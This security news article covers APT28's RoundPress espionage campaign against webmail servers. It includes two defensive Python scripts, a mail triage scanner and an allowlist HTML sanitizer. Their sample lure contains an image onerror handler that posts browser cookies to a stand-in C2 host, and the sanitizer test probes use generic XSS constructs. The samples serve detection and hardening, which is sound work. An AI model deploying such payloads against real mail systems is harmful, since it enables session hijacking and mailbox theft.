Global Cyber Espionage Alert: APT28’s “RoundPress” Attack Exploits Webmail Vulnerabilities


Introduction:

A silent cyber-espionage campaign has been running behind the scenes, aimed at some of the most sensitive mailboxes there are. The newly documented operation, RoundPress, has been linked to the Russian state-backed group APT28, also known as Fancy Bear (ESET tracks it as Sednit). By exploiting both zero-day and already-patched (n-day) cross-site scripting flaws in popular webmail servers, the group read its way into government, military and defense-contractor mailboxes in several countries. ESET's findings are a reminder that a webmail front end is part of the attack surface and needs the same hardening as any other internet-facing application.

Inside the RoundPress Operation (30-line Digest):

ESET researchers have documented a stealthy espionage campaign they call Operation RoundPress and attribute, with medium confidence, to APT28. The campaign began in 2023 and continued through 2024, exploiting XSS vulnerabilities in several widely deployed webmail platforms: Roundcube, Horde, MDaemon and Zimbra. Known victims include governments in Greece, Serbia, Ukraine and Cameroon; military organizations in Ukraine and Ecuador; and defense companies in Bulgaria, Romania and Ukraine.

The attackers send spearphishing emails whose visible body is a snippet of a real news article, which makes the message look routine. The XSS payload travels inside the HTML part of the same message. When the victim opens the email in a vulnerable webmail client, the client renders the HTML, the flaw lets the embedded JavaScript through, and the script runs in the browser inside the webmail session. No link has to be clicked and no attachment opened; viewing the message is enough. Because the script executes in the webmail's own origin, it can drive the application's interface as the logged-in user: it harvests messages, login credentials and contact lists and, on MDaemon, the user's 2FA secret (which let the attackers create an application password and bypass 2FA), then posts everything to command-and-control servers whose addresses are hardcoded in the script.

Each payload is tailored to one platform and one flaw. Roundcube was hit through two separate XSS bugs, CVE-2020-35730 (used in 2023) and CVE-2023-43770 (used in 2024), both of which let script carried in message content execute when the mail is displayed. MDaemon was hit with a zero-day, CVE-2024-11182, an XSS in the webmail's HTML handling that accepted a crafted construct and let the browser execute the script it carried. Zimbra was exploited through CVE-2024-27443, an XSS reachable via calendar invite data. An attempt against Horde failed, which suggests the group was probing whichever webmail a given target happened to run.
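The delivery path described in the two paragraphs above, as an added example that is not ESET's tooling and not a RoundPress signature: a Python triage script that parses a message with the standard library's email package, extracts every text/html part and flags the constructs a view-triggered webmail payload usually needs (inline script, event-handler attributes, javascript: URLs, outbound fetch calls). The two sample messages, the *.invalid hosts and the indicator list are constructed for this example.

```python
"""Triage scanner for HTML mail parts carrying active content.

Added example, not ESET's tooling and not a RoundPress signature: parses an
RFC 5322 message with the standard library, pulls every text/html part and
flags constructs that a view-triggered webmail XSS typically needs. All sample
messages, hosts (*.invalid) and the indicator list are constructed here.
"""
import re
from email import message_from_bytes, policy

# Constructs that have no business in a newsletter-style lure but that a
# zero-click webmail payload usually needs. Cheap to review on a hit.
INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "javascript_url": re.compile(r"(?:href|src|action)\s*=\s*['\"]?\s*javascript:", re.I),
    "outbound_fetch": re.compile(r"\b(?:fetch|XMLHttpRequest)\s*\(", re.I),
}

# Constructed lure: news-snippet text part plus an HTML part whose <img>
# carries an event handler that posts browser data to a hardcoded host.
SAMPLE_EML = b"""\
From: newsdesk@example.invalid
To: user@victim.invalid
Subject: Breaking: regional summit concludes
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset=utf-8

Read the full story online.
--b1
Content-Type: text/html; charset=utf-8

<html><body>
<p>Delegates agreed on a joint statement after two days of talks.</p>
<img src="https://cdn.example.invalid/a.png" onerror="fetch('https://c2.example.invalid/', {method: 'POST', body: document.cookie})">
</body></html>
--b1--
"""

# Constructed benign message for comparison.
CLEAN_EML = b"""\
From: newsdesk@example.invalid
To: user@victim.invalid
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8

<html><body><p>Nothing to see here.</p></body></html>
"""


def scan_message(raw: bytes) -> dict:
    """Return subject, number of HTML parts and (indicator, line, snippet) hits."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    html_parts = 0
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html_parts += 1
        body = part.get_content()  # decoded per the part's charset/encoding
        for name, rx in INDICATORS.items():
            for m in rx.finditer(body):
                line_no = body.count("\n", 0, m.start()) + 1
                snippet = body[m.start():m.start() + 60].replace("\n", " ")
                findings.append((name, line_no, snippet))
    return {
        "subject": str(msg["subject"]),
        "html_parts": html_parts,
        "findings": findings,
        "suspicious": bool(findings),
    }


if __name__ == "__main__":
    for label, raw in (("lure", SAMPLE_EML), ("clean", CLEAN_EML)):
        result = scan_message(raw)
        print(f"[{label}] {result['subject']!r}: suspicious={result['suspicious']}")
        for name, line_no, snippet in result["findings"]:
            print(f"    {name:<15} line {line_no}: {snippet}")
```

Run it against a folder of exported .eml files at the gateway or from a mailbox dump; the lure trips the event_handler and outbound_fetch indicators on the image line, the digest trips nothing. The indicator list is deliberately generic: it is a hunting aid for a stack of suspicious mail, not a detection for any particular CVE.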

ESET recorded no RoundPress emails so far in 2025, but the technique remains viable: new XSS vulnerabilities in webmail products keep appearing, and each one is a fresh delivery vehicle for the same kind of payload. The campaign shows how a flaw that is routinely triaged as moderate severity can become the starting point for a wide-reaching data breach, and why email infrastructure deserves sustained attention in both the public and private sectors.

What Undercode Say:

APT28’s RoundPress campaign exemplifies the modern nature of espionage—quiet, precise, and devastatingly effective. This isn’t about brute force hacks or ransomware headlines. Instead, it’s about infiltrating the very communication tools we trust daily. These kinds of operations showcase the refined craftsmanship of state-sponsored threat actors who understand how to exploit small cracks for major gains.

Phishing is still the entry point, but what makes RoundPress dangerous is that the malicious code runs without any user interaction beyond reading the mail. XSS flaws are frequently rated as moderate, yet in a webmail client the injected script runs with the victim's authenticated session, so a single XSS is in practice a takeover of the mailbox. Platforms such as Roundcube and Zimbra, widely used by governments and businesses, become weak points if they are not audited and patched promptly; both Roundcube bugs used here had fixes available before they were exploited.

The technical details also tell a story of adaptation. In 2023 the group used an old, already-patched Roundcube flaw; in 2024 it added a second Roundcube n-day, a Zimbra bug and an MDaemon zero-day, shifting as defenders caught up. The move toward abusing HTML email rendering and calendar-invite handling, rather than malicious documents, targets the webmail UI itself, a layer that many security teams neither test nor monitor.

The campaign also exposes a systemic weakness: webmail products are still shipping XSS bugs despite decades of awareness. Patching is necessary but not sufficient; the rendering path has to be designed so that a sanitizer slip does not become code execution in the user's session. Practical measures include allowlist-based HTML sanitization rather than blocklists, a strict Content-Security-Policy that forbids inline script, and rendering message bodies in a sandboxed frame on a separate origin. That one line of JavaScript in an HTML email can exfiltrate an entire mailbox should be treated as an architectural finding, not just a bug.
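As an added example (not code from Roundcube, Zimbra, MDaemon or ESET), the allowlist approach recommended above, in Python: a naive blocklist sanitizer that only strips script blocks is shown beside a parser-based sanitizer that re-emits only known-safe tags, attributes and URL schemes. The probe strings are constructed generic XSS patterns standing in for the class of view-triggered flaws discussed on this page, not the actual RoundPress payloads, which the page does not reproduce.

```python
"""Allowlist HTML sanitizer for rendering untrusted e-mail bodies.

Added example, not code from ESET, Roundcube, MDaemon or Zimbra. Contrasts a
blocklist sanitizer (strip <script> and hope) with a parser-driven allowlist
rebuild. PROBES are constructed generic XSS patterns, not RoundPress payloads.
"""
import re
from html import escape
from html.parser import HTMLParser

# Tags a mail client can reasonably render; anything else is dropped.
ALLOWED_TAGS = {"a", "b", "i", "u", "p", "br", "div", "span", "img", "table",
                "tr", "td", "th", "ul", "ol", "li", "strong", "em"}
VOID_TAGS = {"br", "img"}
# Per-tag attribute allowlist. Event handlers (on*) are never listed.
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                 "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http://", "https://", "mailto:", "cid:")
RAW_TEXT_TAGS = {"script", "style"}  # parser hands their content over raw


def naive_sanitize(html: str) -> str:
    """Blocklist: remove <script> blocks and nothing else (what not to do)."""
    return re.sub(r"<script\b.*?</script>", "", html, flags=re.I | re.S)


def safe_url(value: str) -> bool:
    """Allow only known schemes after stripping whitespace/control characters,
    so 'java\\tscript:' is not waved through."""
    cleaned = re.sub(r"[\s\x00-\x1f]", "", value).lower()
    return cleaned.startswith(SAFE_SCHEMES) or cleaned.startswith("#")


class AllowlistSanitizer(HTMLParser):
    """Re-emit only allowlisted tags/attributes from the parsed token stream.
    Unknown tags, comments, declarations and unsafe URLs are dropped and text
    is re-escaped, so nothing reaches the output unless explicitly allowed."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.dropped = 0       # tags/attributes discarded, useful for logging
        self._skipping = None  # raw-text element whose content is being skipped

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self._skipping = tag
        if tag not in ALLOWED_TAGS:
            self.dropped += 1
            return
        kept = []
        for name, value in attrs:  # HTMLParser lowercases tag and attr names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped += 1
                continue
            value = value or ""
            if name in URL_ATTRS and not safe_url(value):
                self.dropped += 1
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self._skipping:
            self._skipping = None
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skipping is None:
            self.out.append(escape(data))

    def handle_comment(self, data):
        self.dropped += 1

    def handle_decl(self, decl):
        self.dropped += 1

    def handle_pi(self, data):
        self.dropped += 1


def sanitize(html: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def still_active(html: str) -> bool:
    """Crude check for script-bearing constructs that survived sanitization."""
    return re.search(r"<script|\bon[a-z]+\s*=|javascript:", html, re.I) is not None


# Constructed probes: generic XSS patterns, not the RoundPress payloads.
PROBES = [
    '<p>Hello</p><script>fetch("https://c2.example.invalid/")</script>',
    '<img src="https://cdn.example.invalid/a.png" onerror="fetch(\'https://c2.example.invalid/\')">',
    '<a href="javascript:alert(1)">link</a>',
    '<a href="java\tscript:alert(1)">link</a>',
    '<svg onload="alert(1)"></svg>',
    '<ScRiPt>alert(1)</sCrIpT><b>bold</b>',
]

if __name__ == "__main__":
    for probe in PROBES:
        print(f"naive active={still_active(naive_sanitize(probe))!s:<5} "
              f"allowlist -> {sanitize(probe)!r}")
```

The blocklist version handles the first probe and fails every other one, because the script never needed a script tag. The allowlist version makes the opposite trade: a tag or attribute the developer forgot to list is lost from the rendering, which is an inconvenience, whereas a construct the blocklist forgot is code execution in the user's session. Production webmail should combine this with a CSP that disallows inline script, so that a future sanitizer bypass still has no way to run.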

As organizations move toward web-based tools for convenience, they must balance it with hardened security practices. Zero-day and n-day exploits are increasingly becoming tools in cyberwarfare, and defensive postures must adapt accordingly. RoundPress is a loud wake-up call to treat webmail with the same level of scrutiny given to critical infrastructure.

Fact Checker Results ✅:

✔️ Confirmed XSS vulnerabilities were used against Roundcube, MDaemon and Zimbra; the Horde attempt failed
✔️ No malware was dropped on the host: the SpyPress script runs only while the message is rendered (some Roundcube variants additionally added a Sieve forwarding rule to keep receiving copies of the victim's mail)

Prediction:

If current trends continue, 2025 will likely see an escalation in email-based zero-click attacks, especially via XSS in under-maintained platforms. APT28 and similar groups will continue evolving their methods, increasingly targeting overlooked layers like browser-based interfaces and calendar functions. Government agencies and enterprise security teams must proactively test and harden their email infrastructure, or risk becoming the next victim in a silent but highly strategic digital war.

References:

Reported By: www.bleepingcomputer.com